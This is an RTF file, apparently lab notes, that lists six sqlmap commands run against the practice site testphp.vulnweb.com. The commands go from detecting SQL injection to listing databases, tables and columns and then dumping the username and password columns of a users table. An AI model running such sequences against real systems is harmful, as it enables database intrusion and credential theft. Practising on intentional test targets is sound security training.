{\rtf1\ansi\ansicpg1252\cocoartf2638
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;\red11\green76\blue180;}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;\cssrgb\c1961\c38824\c75686;}
\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs48 \cf2 \expnd0\expndtw0\kerning0
Queries \
\
\pard\tx1602\pardeftab720\partightenfactor0
\cf2 Query 1 : $ sqlmap -u {\field{\*\fldinst{HYPERLINK "http://testphp.vulnweb.com/artists.php?artist=2"}}{\fldrslt \cf3 \ul \ulc3 http://testphp.vulnweb.com/artists.php?artist=2}}
\fs32 \
\pard\pardeftab720\partightenfactor0

\fs48 \cf2 \'a0
\fs32 \

\fs48 \'a0
\fs32 \
\pard\tx1602\pardeftab720\partightenfactor0

\fs48 \cf2 Query 2 :$ sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 \'96dbs
\fs32 \
\pard\pardeftab720\partightenfactor0

\fs48 \cf2 \'a0
\fs32 \

\fs48 \'a0
\fs32 \
\pard\tx1602\pardeftab720\partightenfactor0

\fs48 \cf2 Query 3 :$ sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart \'96tables
\fs32 \
\pard\pardeftab720\partightenfactor0

\fs48 \cf2 \'a0
\fs32 \
\pard\tx1602\pardeftab720\partightenfactor0

\fs48 \cf2 Query 4 :$ sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users \'96columns
\fs32 \
\pard\pardeftab720\partightenfactor0

\fs48 \cf2 \'a0\'a0
\fs32 \
\pard\tx1602\pardeftab720\partightenfactor0

\fs48 \cf2 Query 5 :$ sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users -C uname \'96dump
\fs32 \
\pard\pardeftab720\partightenfactor0

\fs48 \cf2 \'a0
\fs32 \
\pard\tx1602\pardeftab720\partightenfactor0

\fs48 \cf2 Query 6 :$ sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users -C pass \'96dump
\fs32 \
\pard\pardeftab720\partightenfactor0

\fs48 \cf2 \'a0
\fs32 \
}